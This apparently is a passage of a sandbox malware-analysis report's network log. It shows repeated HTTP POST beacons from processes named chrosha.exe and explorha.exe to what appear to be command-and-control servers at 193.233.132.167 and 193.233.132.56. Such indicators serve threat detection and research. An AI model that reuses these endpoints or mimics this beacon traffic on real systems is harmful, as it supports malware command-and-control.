                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
661 | 192.168.2.5 | 50507 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:00.843166113 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:01.092461109 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
662 | 192.168.2.5 | 50508 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:01.135251045 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:01.383760929 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
663  192.168.2.5  50509  193.233.132.167  80  8024  C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:33:01.457005024 CEST  155  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:01.700339079 CEST  197  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
664  192.168.2.5  50510  193.233.132.56  80  4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:33:01.638818979 CEST  312  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:01.894475937 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
665  192.168.2.5  50511  193.233.132.167  80  8024  C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:33:01.943331957 CEST  309  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:02.188191891 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
666  192.168.2.5  50512  193.233.132.56  80  4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:33:02.255332947 CEST  158  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:02.498941898 CEST  219  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
667  192.168.2.5  50513  193.233.132.167  80  8024  C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:33:02.550889015 CEST  155  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:02.793066025 CEST  197  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
668  192.168.2.5  50514  193.233.132.56  80  4484  C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:33:02.747262001 CEST  312  OUT  POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:02.996404886 CEST  196  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
669  192.168.2.5  50515  193.233.132.167  80  8024  C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp  Bytes transferred  Direction  Data
Apr 19, 2024 03:33:03.041003942 CEST  309  OUT  POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:03.291348934 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
670 | 192.168.2.5 | 50516 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:03.355731010 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:33:03.603471994 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:33:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
671 | 192.168.2.5 | 50517 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:03.650367975 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:33:03.898024082 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:33:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
672 | 192.168.2.5 | 50518 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:03.852574110 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:04.100383043 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:33:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
673 | 192.168.2.5 | 50519 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:04.153135061 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:04.407479048 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:33:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
674 | 192.168.2.5 | 50520 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:04.479057074 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:33:04.727340937 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:33:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID: 675 | Source IP: 192.168.2.5 | Source Port: 50521 | Destination IP: 193.233.132.167 | Destination Port: 80 | PID: 8024 | Process: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp: Apr 19, 2024 03:33:04.774080992 CEST | Bytes transferred: 155 | Direction: OUT | Data:
POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Timestamp: Apr 19, 2024 03:33:05.021327972 CEST | Bytes transferred: 197 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID: 676 | Source IP: 192.168.2.5 | Source Port: 50522 | Destination IP: 193.233.132.56 | Destination Port: 80 | PID: 4484 | Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp: Apr 19, 2024 03:33:04.981204033 CEST | Bytes transferred: 312 | Direction: OUT | Data:
POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Timestamp: Apr 19, 2024 03:33:05.233587027 CEST | Bytes transferred: 196 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID: 677 | Source IP: 192.168.2.5 | Source Port: 50523 | Destination IP: 193.233.132.167 | Destination Port: 80 | PID: 8024 | Process: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp: Apr 19, 2024 03:33:05.279848099 CEST | Bytes transferred: 309 | Direction: OUT | Data:
POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Timestamp: Apr 19, 2024 03:33:05.533519030 CEST | Bytes transferred: 196 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID: 678 | Source IP: 192.168.2.5 | Source Port: 50524 | Destination IP: 193.233.132.56 | Destination Port: 80 | PID: 4484 | Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp: Apr 19, 2024 03:33:05.585309029 CEST | Bytes transferred: 158 | Direction: OUT | Data:
POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Timestamp: Apr 19, 2024 03:33:05.831723928 CEST | Bytes transferred: 219 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID: 679 | Source IP: 192.168.2.5 | Source Port: 50525 | Destination IP: 193.233.132.167 | Destination Port: 80 | PID: 8024 | Process: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
